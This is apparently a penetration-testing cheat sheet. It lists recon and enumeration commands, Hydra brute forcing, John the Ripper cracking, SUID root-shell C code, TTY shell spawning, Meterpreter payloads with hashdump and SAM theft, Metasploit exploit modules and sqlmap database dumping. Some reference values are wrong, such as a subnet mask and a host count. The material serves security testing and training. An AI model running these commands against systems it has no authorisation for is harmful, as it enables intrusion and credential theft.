Recon and Enumeration
Nmap Commands
For more commands, see the Nmap cheat sheet (link in the menu on the right).
Basic Nmap Commands:
| COMMAND
| DESCRIPTION
|
|---|
| nmap -v -sS -A -T4 target
| Nmap verbose scan, runs syn stealth, T4 timing (should be ok on LAN), OS and service version info, traceroute and scripts against services
|
| nmap -v -sS -p--A -T4 target
| As above but scans all TCP ports (takes a lot longer)
|
| nmap -v -sU -sS -p- -A -T4 target
| As above but scans all TCP ports and UDP scan (takes even longer)
|
| nmap -v -p 445 --script=smb-check-vulns
--script-args=unsafe=1 192.168.1.X
| Nmap script to scan for vulnerable SMB servers - WARNING: unsafe=1 may cause knockover
|
| ls /usr/share/nmap/scripts/* | grep ftp
| Search nmap scripts for keywords
|
SMB enumeration
Also see, nbtscan cheat sheet (right hand menu).
| COMMAND
| DESCRIPTION
|
|---|
| nbtscan 192.168.1.0/24
| Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
|
| enum4linux -a target-ip
| Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing
|
Other Host Discovery
Other methods of host discovery, that don’t use nmap…
| COMMAND
| DESCRIPTION
|
|---|
| netdiscover -r 192.168.1.0/24
| Discovers IP, MAC Address and MAC vendor on the subnet from ARP, helpful for confirming you're on the right VLAN at $client site
|
SMB Enumeration
Enumerate Windows shares / Samba shares.
| COMMAND
| DESCRIPTION
|
|---|
| nbtscan 192.168.1.0/24
| Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
|
| enum4linux -a target-ip
| Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing
|
Python Local Web Server
Python local web server command, handy for serving up shells and exploits on an attacking machine.
| COMMAND
| DESCRIPTION
|
|---|
| python -m SimpleHTTPServer 80
| Run a basic http server, great for serving up shells etc
|
Mounting File Shares
How to mount NFS / CIFS, Windows and Linux file shares.
| COMMAND
| DESCRIPTION
|
|---|
| mount 192.168.1.1:/vol/share /mnt/nfs
| Mount NFS share to /mnt/nfs
|
| mount -t cifs -o username=user,password=pass
,domain=blah //192.168.1.X/share-name /mnt/cifs
| Mount Windows CIFS / SMB share on Linux at /mnt/cifs if you remove password it will prompt on the CLI (more secure as it wont end up in bash_history)
|
| net use Z: \\win-server\share password
/user:domain\janedoe /savecred /p:no
| Mount a Windows share on Windows from the command line
|
| apt-get install smb4k -y
| Install smb4k on Kali, useful Linux GUI for browsing SMB shares
|
Basic Finger Printing
Manual finger printing / banner grabbing.
| COMMAND
| DESCRIPTION
|
|---|
| nc -v 192.168.1.1 25
telnet 192.168.1.1 25
| Basic versioning / finger printing via displayed banner
|
SNMP Enumeration
| COMMAND
| DESCRIPTION
|
|---|
| snmpcheck -t 192.168.1.X -c public
snmpwalk -c public -v1 192.168.1.X 1|
grep hrSWRunName|cut -d* * -f
snmpenum -t 192.168.1.X
onesixtyone -c names -i hosts
| SNMP enumeration
|
DNS Zone Transfers
| COMMAND
| DESCRIPTION
|
|---|
| nslookup -> set type=any -> ls -d blah.com
| Windows DNS zone transfer
|
| dig axfr blah.com @ns1.blah.com
| Linux DNS zone transfer
|
DNSRecon
DNS Enumeration Kali - DNSRecon
root:
~# dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml
HTTP / HTTPS Webserver Enumeration
| COMMAND
| DESCRIPTION
|
|---|
| nikto -h 192.168.1.1
| Perform a nikto scan against target
|
| dirbuster
| Configure via GUI, CLI input doesn't work most of the time
|
Packet Inspection
| COMMAND
| DESCRIPTION
|
|---|
| tcpdump tcp port 80 -w output.pcap -i eth0
| tcpdump for port 80 on interface eth0, outputs to output.pcap
|
Username Enumeration
Some techniques used to remotely enumerate users on a target system.
SMB User Enumeration
| COMMAND
| DESCRIPTION
|
|---|
| python /usr/share/doc/python-impacket-doc/examples
/samrdump.py 192.168.XXX.XXX
| Enumerate users from SMB
|
| ridenum.py 192.168.XXX.XXX 500 50000 dict.txt
| RID cycle SMB / enumerate users from SMB
|
SNMP User Enumeration
| COMMAND
| DESCRIPTION
|
|---|
| snmpwalk public -v1 192.168.X.XXX 1 |grep 77.1.2.25
|cut -d” “ -f4
| Enmerate users from SNMP
|
| python /usr/share/doc/python-impacket-doc/examples/
samrdump.py SNMP 192.168.X.XXX
| Enmerate users from SNMP
|
| nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt
(then grep)
| Search for SNMP servers with nmap, grepable output
|
Passwords
Wordlists
| COMMAND
| DESCRIPTION
|
|---|
| /usr/share/wordlists
| Kali word lists
|
Brute Forcing Services
Hydra FTP Brute Force
| COMMAND
| DESCRIPTION
|
|---|
| hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f
192.168.X.XXX ftp -V
| Hydra FTP brute force
|
Hydra POP3 Brute Force
| COMMAND
| DESCRIPTION
|
|---|
| hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f
192.168.X.XXX pop3 -V
| Hydra POP3 brute force
|
Hydra SMTP Brute Force
| COMMAND
| DESCRIPTION
|
|---|
| hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V
| Hydra SMTP brute force
|
Use
-t to limit concurrent connections, example:
-t 15
Password Cracking
John The Ripper - JTR
| COMMAND
| DESCRIPTION
|
|---|
| john --wordlist=/usr/share/wordlists/rockyou.txt hashes
| JTR password cracking
|
| john --format=descrypt --wordlist
/usr/share/wordlists/rockyou.txt hash.txt
| JTR forced descrypt cracking with wordlist
|
| john --format=descrypt hash --show
| JTR forced descrypt brute force cracking
|
Exploit Research
Ways to find exploits for enumerated hosts / services.
| COMMAND
| DESCRIPTION
|
|---|
| searchsploit windows 2003 | grep -i local
| Search exploit-db for exploit, in this example windows 2003 + local esc
|
| site:exploit-db.com exploit kernel <= 3
| Use google to search exploit-db.com for exploits
|
| grep -R "W7" /usr/share/metasploit-framework
/modules/exploit/windows/*
| Search metasploit modules using grep - msf search sucks a bit
|
Windows Penetration Testing Commands
See Windows Penetration Testing Commands.
Linux Penetration Testing Commands
See Linux Commands Cheat Sheet (right hand menu) for a list of Linux Penetration testing commands, useful for local system enumeration.
Compiling Exploits
Some notes on compiling exploits.
Identifying if C code is for Windows or Linux
C #includes will indicate which OS should be used to build the exploit.
| COMMAND
| DESCRIPTION
|
|---|
| process.h, string.h, winbase.h, windows.h, winsock2.h
| Windows exploit code
|
| arpa/inet.h, fcntl.h, netdb.h, netinet/in.h,
sys/sockt.h, sys/types.h, unistd.h
| Linux exploit code
|
Build Exploit GCC
Compile exploit gcc.
| COMMAND
| DESCRIPTION
|
|---|
| gcc -o exploit exploit.c
| Basic GCC compile
|
GCC Compile 32Bit Exploit on 64Bit Kali
Handy for cross compiling 32 bit binaries on 64 bit attacking machines.
| COMMAND
| DESCRIPTION
|
|---|
| gcc -m32 exploit.c -o exploit
| Cross compile 32 bit binary on 64 bit Linux
|
Compile Windows .exe on Linux
Build / compile windows exploits on Linux, resulting in a .exe file.
| COMMAND
| DESCRIPTION
|
|---|
| i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe
| Compile windows .exe on Linux
|
SUID Binary
Often SUID C binary files are required to spawn a shell as a superuser, you can update the UID / GID and shell as required.
below are some quick copy and pate examples for various shells:
SUID C Shell for /bin/bash
int main(void){
setresuid(0, 0, 0);
system("/bin/bash");
}
SUID C Shell for /bin/sh
int main(void){
setresuid(0, 0, 0);
system("/bin/sh");
}
Building the SUID Shell binary
gcc -o suid suid.c For 32 bit:
gcc -m32 -o suid suid.c
Reverse Shells
See
Reverse Shell Cheat Sheet for a list of useful Reverse Shells.
TTY Shells
Tips / Tricks to spawn a TTY shell from a limited shell in Linux, useful for running commands like
su from reverse shells.
Python TTY Shell Trick
python -c 'import pty;pty.spawn("/bin/bash")'echo os.system('/bin/bash')
Spawn Interactive sh shell
/bin/sh -i
Spawn Perl TTY Shell
exec "/bin/sh";perl —e 'exec "/bin/sh";'
Spawn Ruby TTY Shell
exec "/bin/sh"
Spawn Lua TTY Shell
os.execute('/bin/sh')
Spawn TTY Shell from Vi
Run shell commands from vi:
:!bash
Spawn TTY Shell NMAP
!sh
Metasploit
Some basic Metasploit stuff, that I have found handy for reference.
Basic Metasploit commands, useful for reference, for pivoting see -
Meterpreter Pivoting techniques.
Meterpreter Payloads
Windows reverse meterpreter payload
| COMMAND
| DESCRIPTION
|
|---|
| set payload windows/meterpreter/reverse_tcp
| Windows reverse tcp payload
|
Windows VNC Meterpreter payload
| COMMAND
| DESCRIPTION
|
|---|
| set payload windows/vncinject/reverse_tcp
set ViewOnly false
| Meterpreter Windows VNC Payload
|
Linux Reverse Meterpreter payload
| COMMAND
| DESCRIPTION
|
|---|
| set payload linux/meterpreter/reverse_tcp
| Meterpreter Linux Reverse Payload
|
Meterpreter Cheat Sheet
Useful meterpreter commands.
| COMMAND
| DESCRIPTION
|
|---|
| upload file c:\\windows
| Meterpreter upload file to Windows target
|
| download c:\\windows\\repair\\sam /tmp
| Meterpreter download file from Windows target
|
| download c:\\windows\\repair\\sam /tmp
| Meterpreter download file from Windows target
|
| execute -f c:\\windows\temp\exploit.exe
| Meterpreter run .exe on target - handy for executing uploaded exploits
|
| execute -f cmd -c
| Creates new channel with cmd shell
|
| ps
| Meterpreter show processes
|
| shell
| Meterpreter get shell on the target
|
| getsystem
| Meterpreter attempts priviledge escalation the target
|
| hashdump
| Meterpreter attempts to dump the hashes on the target
|
| portfwd add –l 3389 –p 3389 –r target
| Meterpreter create port forward to target machine
|
| portfwd delete –l 3389 –p 3389 –r target
| Meterpreter delete port forward
|
Common Metasploit Modules
Top metasploit modules.
Remote Windows Metasploit Modules (exploits)
| COMMAND
| DESCRIPTION
|
|---|
| use exploit/windows/smb/ms08_067_netapi
| MS08_067 Windows 2k, XP, 2003 Remote Exploit
|
| use exploit/windows/dcerpc/ms06_040_netapi
| MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit
|
| use exploit/windows/smb/
ms09_050_smb2_negotiate_func_index
| MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit
|
Local Windows Metasploit Modules (exploits)
| COMMAND
| DESCRIPTION
|
|---|
| use exploit/windows/local/bypassuac
| Bypass UAC on Windows 7 + Set target + arch, x86/64
|
Auxilary Metasploit Modules
| COMMAND
| DESCRIPTION
|
|---|
| use auxiliary/scanner/http/dir_scanner
| Metasploit HTTP directory scanner
|
| use auxiliary/scanner/http/jboss_vulnscan
| Metasploit JBOSS vulnerability scanner
|
| use auxiliary/scanner/mssql/mssql_login
| Metasploit MSSQL Credential Scanner
|
| use auxiliary/scanner/mysql/mysql_version
| Metasploit MSSQL Version Scanner
|
| use auxiliary/scanner/oracle/oracle_login
| Metasploit Oracle Login Module
|
Metasploit Powershell Modules
| COMMAND
| DESCRIPTION
|
|---|
| use exploit/multi/script/web_delivery
| Metasploit powershell payload delivery module
|
| post/windows/manage/powershell/exec_powershell
| Metasploit upload and run powershell script through a session
|
| use exploit/multi/http/jboss_maindeployer
| Metasploit JBOSS deploy
|
| use exploit/windows/mssql/mssql_payload
| Metasploit MSSQL payload
|
Post Exploit Windows Metasploit Modules
| COMMAND
| DESCRIPTION
|
|---|
| run post/windows/gather/win_privs
| Metasploit show privileges of current user
|
| use post/windows/gather/credentials/gpp
| Metasploit grab GPP saved passwords
|
| load mimikatz -> wdigest
| Metasplit load Mimikatz
|
| run post/windows/gather/local_admin_search_enum
| Idenitfy other machines that the supplied domain user has administrative access to
|
Networking
TTL Fingerprinting
| OPERATING SYSTEM
| TTL SIZE
|
|---|
| Windows
| 128
|
| Linux
| 64
|
| Solaris
| 255
|
| Cisco / Network
| 255
|
IPv4
Classful IP Ranges
E.g Class A,B,C (depreciated)
| CLASS
| IP ADDRESS RANGE
|
|---|
| Class A IP Address Range
| 0.0.0.0 - 127.255.255.255
|
| Class B IP Address Range
| 128.0.0.0 - 191.255.255.255
|
| Class C IP Address Range
| 192.0.0.0 - 223.255.255.255
|
| Class D IP Address Range
| 224.0.0.0 - 239.255.255.255
|
| Class E IP Address Range
| 240.0.0.0 - 255.255.255.255
|
IPv4 Private Address Ranges
| CLASS
| RANGE
|
|---|
| Class A Private Address Range
| 10.0.0.0 - 10.255.255.255
|
| Class B Private Address Range
| 172.16.0.0 - 172.31.255.255
|
| Class C Private Address Range
| 192.168.0.0 - 192.168.255.255
|
| 127.0.0.0 - 127.255.255.255
|
IPv4 Subnet Cheat Sheet
| CIDR
| DECIMAL MASK
| NUMBER OF HOSTS
|
|---|
| /31
| 255.255.255.254
| 1 Host
|
| /30
| 255.255.255.252
| 2 Hosts
|
| /29
| 255.255.255.249
| 6 Hosts
|
| /28
| 255.255.255.240
| 14 Hosts
|
| /27
| 255.255.255.224
| 30 Hosts
|
| /26
| 255.255.255.192
| 62 Hosts
|
| /25
| 255.255.255.128
| 126 Hosts
|
| /24
| 255.255.255.0
| 254 Hosts
|
| /23
| 255.255.254.0
| 512 Host
|
| /22
| 255.255.252.0
| 1022 Hosts
|
| /21
| 255.255.248.0
| 2046 Hosts
|
| /20
| 255.255.240.0
| 4094 Hosts
|
| /19
| 255.255.224.0
| 8190 Hosts
|
| /18
| 255.255.192.0
| 16382 Hosts
|
| /17
| 255.255.128.0
| 32766 Hosts
|
| /16
| 255.255.0.0
| 65534 Hosts
|
| /15
| 255.254.0.0
| 131070 Hosts
|
| /14
| 255.252.0.0
| 262142 Hosts
|
| /13
| 255.248.0.0
| 524286 Hosts
|
| /12
| 255.240.0.0
| 1048674 Hosts
|
| /11
| 255.224.0.0
| 2097150 Hosts
|
| /10
| 255.192.0.0
| 4194302 Hosts
|
| /9
| 255.128.0.0
| 8388606 Hosts
|
| /8
| 255.0.0.0
| 16777214 Hosts
|
ASCII Table Cheat Sheet
Useful for Web Application Penetration Testing, or if you get stranded on Mars and need to communicate with NASA.
| ASCII
| CHARACTER
|
|---|
| x00
| Null Byte
|
| x08
| BS
|
| x09
| TAB
|
| x0a
| LF
|
| x0d
| CR
|
| x1b
| ESC
|
| x20
| SPC
|
| x21
| !
|
| x22
| "
|
| x23
| #
|
| x24
| $
|
| x25
| %
|
| x26
| &
|
| x27
| `
|
| x28
| (
|
| x29
| )
|
| x2a
| *
|
| x2b
| +
|
| x2c
| ,
|
| x2d
| -
|
| x2e
| .
|
| x2f
| /
|
| x30
| 0
|
| x31
| 1
|
| x32
| 2
|
| x33
| 3
|
| x34
| 4
|
| x35
| 5
|
| x36
| 6
|
| x37
| 7
|
| x38
| 8
|
| x39
| 9
|
| x3a
| :
|
| x3b
| ;
|
| x3c
| <
|
| x3d
| =
|
| x3e
| >
|
| x3f
| ?
|
| x40
| @
|
| x41
| A
|
| x42
| B
|
| x43
| C
|
| x44
| D
|
| x45
| E
|
| x46
| F
|
| x47
| G
|
| x48
| H
|
| x49
| I
|
| x4a
| J
|
| x4b
| K
|
| x4c
| L
|
| x4d
| M
|
| x4e
| N
|
| x4f
| O
|
| x50
| P
|
| x51
| Q
|
| x52
| R
|
| x53
| S
|
| x54
| T
|
| x55
| U
|
| x56
| V
|
| x57
| W
|
| x58
| X
|
| x59
| Y
|
| x5a
| Z
|
| x5b
| [
|
| x5c
| \
|
| x5d
| ]
|
| x5e
| ^
|
| x5f
| _
|
| x60
| `
|
| x61
| a
|
| x62
| b
|
| x63
| c
|
| x64
| d
|
| x65
| e
|
| x66
| f
|
| x67
| g
|
| x68
| h
|
| x69
| i
|
| x6a
| j
|
| x6b
| k
|
| x6c
| l
|
| x6d
| m
|
| x6e
| n
|
| x6f
| o
|
| x70
| p
|
| x71
| q
|
| x72
| r
|
| x73
| s
|
| x74
| t
|
| x75
| u
|
| x76
| v
|
| x77
| w
|
| x78
| x
|
| x79
| y
|
| x7a
| z
|
CISCO IOS Commands
A collection of useful Cisco IOS commands.
| COMMAND
| DESCRIPTION
|
|---|
| enable
| Enters enable mode
|
| conf t
| Short for, configure terminal
|
| (config)# interface fa0/0
| Configure FastEthernet 0/0
|
| (config-if)# ip addr 0.0.0.0 255.255.255.255
| Add ip to fa0/0
|
| (config-if)# ip addr 0.0.0.0 255.255.255.255
| Add ip to fa0/0
|
| (config-if)# line vty 0 4
| Configure vty line
|
| (config-line)# login
| Cisco set telnet password
|
| (config-line)# password YOUR-PASSWORD
| Set telnet password
|
| # show running-config
| Show running config loaded in memory
|
| # show startup-config
| Show sartup config
|
| # show version
| show cisco IOS version
|
| # show session
| display open sessions
|
| # show ip interface
| Show network interfaces
|
| # show interface e0
| Show detailed interface info
|
| # show ip route
| Show routes
|
| # show access-lists
| Show access lists
|
| # dir file systems
| Show available files
|
| # dir all-filesystems
| File information
|
| # dir /all
| SHow deleted files
|
| # terminal length 0
| No limit on terminal output
|
| # copy running-config tftp
| Copys running config to tftp server
|
| # copy running-config startup-config
| Copy startup-config to running-config
|
Cryptography
Hash Lengths
| HASH
| SIZE
|
|---|
| MD5 Hash Length
| 16 Bytes
|
| SHA-1 Hash Length
| 20 Bytes
|
| SHA-256 Hash Length
| 32 Bytes
|
| SHA-512 Hash Length
| 64 Bytes
|
Hash Examples
Likely just use hash-identifier for this but here are some example hashes:
| HASH
| EXAMPLE
|
|---|
| MD5 Hash Example
| 8743b52063cd84097a65d1633f5c74f5
|
| MD5 $PASS:$SALT Example
| 01dfae6e5d4d90d9892622325959afbe:7050461
|
| MD5 $SALT:$PASS
| f0fda58630310a6dd91a7d8f0a4ceda2:4225637426
|
| SHA1 Hash Example
| b89eaac7e61417341b710b727768294d0e6a277b
|
| SHA1 $PASS:$SALT
| 2fc5a684737ce1bf7b3b239df432416e0dd07357:2014
|
| SHA1 $SALT:$PASS
| cac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024
|
| SHA-256
| 127e6fbfe24a750e72930c220a8e138275656b
8e5d8f48a98c3c92df2caba935
|
| SHA-256 $PASS:$SALT
| c73d08de890479518ed60cf670d17faa26a4a7
1f995c1dcc978165399401a6c4
|
| SHA-256 $SALT:$PASS
| eb368a2dfd38b405f014118c7d9747fcc97f4
f0ee75c05963cd9da6ee65ef498:560407001617
|
| SHA-512
| 82a9dda829eb7f8ffe9fbe49e45d47d2dad9
664fbb7adf72492e3c81ebd3e29134d9bc
12212bf83c6840f10e8246b9db54a4
859b7ccd0123d86e5872c1e5082f
|
| SHA-512 $PASS:$SALT
| e5c3ede3e49fb86592fb03f471c35ba13e8
d89b8ab65142c9a8fdafb635fa2223c24e5
558fd9313e8995019dcbec1fb58414
6b7bb12685c7765fc8c0d51379fd
|
| SHA-512 $SALT:$PASS
| 976b451818634a1e2acba682da3fd6ef
a72adf8a7a08d7939550c244b237c72c7d4236754
4e826c0c83fe5c02f97c0373b6b1
386cc794bf0d21d2df01bb9c08a
|
| NTLM Hash Example
| b4b9b02e6f09a9bd760f388b67351e2b
|
SQLMap Examples
| COMMAND
| DESCRIPTION
|
|---|
| sqlmap -u http://meh.com --forms --batch --crawl=10
--cookie=jsessionid=54321 --level=5 --risk=3
| Automated sqlmap scan
|
| sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE
--level=3 --current-user --current-db --passwords
--file-read="/var/www/blah.php"
| Targeted sqlmap scan
|
| sqlmap -u "http://meh.com/meh.php?id=1"
--dbms=mysql --tech=U --random-agent --dump
| Scan url for union + error based injection with mysql backend
and use a random user agent + database dump
|
| sqlmap -o -u "http://meh.com/form/" --forms
| sqlmap check form for injection
|
| sqlmap -o -u "http://meh/vuln-form" --forms
-D database-name -T users --dump
| sqlmap dump and crack hashes for table users on database-name.
|